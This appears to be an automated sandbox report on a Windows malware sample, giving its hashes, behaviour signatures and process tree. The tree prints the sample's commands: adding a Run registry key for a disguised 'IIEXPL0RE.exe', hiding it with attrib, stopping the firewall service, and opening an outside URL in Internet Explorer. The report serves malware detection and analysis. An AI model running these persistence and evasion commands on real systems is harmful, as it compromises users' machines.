Overview

overview

8

Static

static

cf1dc801ae...34.exe

windows7-x64

1

cf1dc801ae...34.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    189s
  • max time network
    229s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2022 20:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34.exe

  • Size

    32KB

  • MD5

    1ef628413fefd037f07aaff41f94d72e

  • SHA1

    ac46289014e8eb1a8870c2ff84d65ada839111fd

  • SHA256

    cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34

  • SHA512

    e13dc94e8f833890dd30b9730888031b699a9eb51ebbf13efc7c498cb7de48e6b9d9e122038d5367c73cd92ab5db9d3c9149c6c4e5bea913a7d0cb0cb54f9325

  • SSDEEP

    384:JR9J8pn12m/wdynnRM144+HJBC03tqvXJTDQ3Dl9BNAb:NJOn12mognRL4+HJBd3tqv5TDMjA

Score
8/10
evasionpersistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34.exe
    "C:\Users\Admin\AppData\Local\Temp\cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5080
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" "http://blogblog.w07.08host.com/post.asp?id=158 30 44 95 50 105 122 66 34 52 244 46 "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:220
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" "http://blogblog.w07.08host.com/post.asp?id=158 30 44 95 50 105 122 66 34 52 244 46 "
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:116 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\system\temp.bat
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.1
        3⤵
        • Runs ping.exe
        PID:4528
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v IIEXPL0RE /d C:\Windows\system\IIEXPL0RE.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1796
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h "C:\Windows\system\IIEXPL0RE.exe"
        3⤵
        • Sets file to hidden
        • Drops file in Windows directory
        • Views/modifies file attributes
        PID:2052
      • C:\Windows\system\IIEXPL0RE.exe
        "C:\Windows\system\IIEXPL0RE.exe"
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3772
        • C:\Windows\SysWOW64\net.exe
          net stop sharedaccess
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4280
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop sharedaccess
            5⤵
              PID:4536

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\System\IIEXPL0RE.exe
      Filesize

      32KB

      MD5

      1ef628413fefd037f07aaff41f94d72e

      SHA1

      ac46289014e8eb1a8870c2ff84d65ada839111fd

      SHA256

      cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34

      SHA512

      e13dc94e8f833890dd30b9730888031b699a9eb51ebbf13efc7c498cb7de48e6b9d9e122038d5367c73cd92ab5db9d3c9149c6c4e5bea913a7d0cb0cb54f9325

      Download Submit

    • C:\Windows\system\IIEXPL0RE.exe
      Filesize

      32KB

      MD5

      1ef628413fefd037f07aaff41f94d72e

      SHA1

      ac46289014e8eb1a8870c2ff84d65ada839111fd

      SHA256

      cf1dc801ae837c49ed764ea0b583a762039e289fb56fbe43f18532a74b6dfd34

      SHA512

      e13dc94e8f833890dd30b9730888031b699a9eb51ebbf13efc7c498cb7de48e6b9d9e122038d5367c73cd92ab5db9d3c9149c6c4e5bea913a7d0cb0cb54f9325

      Download Submit

    • C:\Windows\system\temp.bat
      Filesize

      478B

      MD5

      3dd4fee1ac61dbaad7381e669a71fb81

      SHA1

      8ea66256e673d1068ce42dc099167187fe93a54b

      SHA256

      6c72c6eb3178cfae91293092641e135b74dc23f12c98a30c02c4e8f7156bcdc1

      SHA512

      53284df289821e573169a7411f5c4f8d7b29270b08e229d1031c6e382549fc9ecf88f7bfbc2c956573399c5906feaa00d9e4264c67c9fd6abc1aa718dee59df8

      Download Submit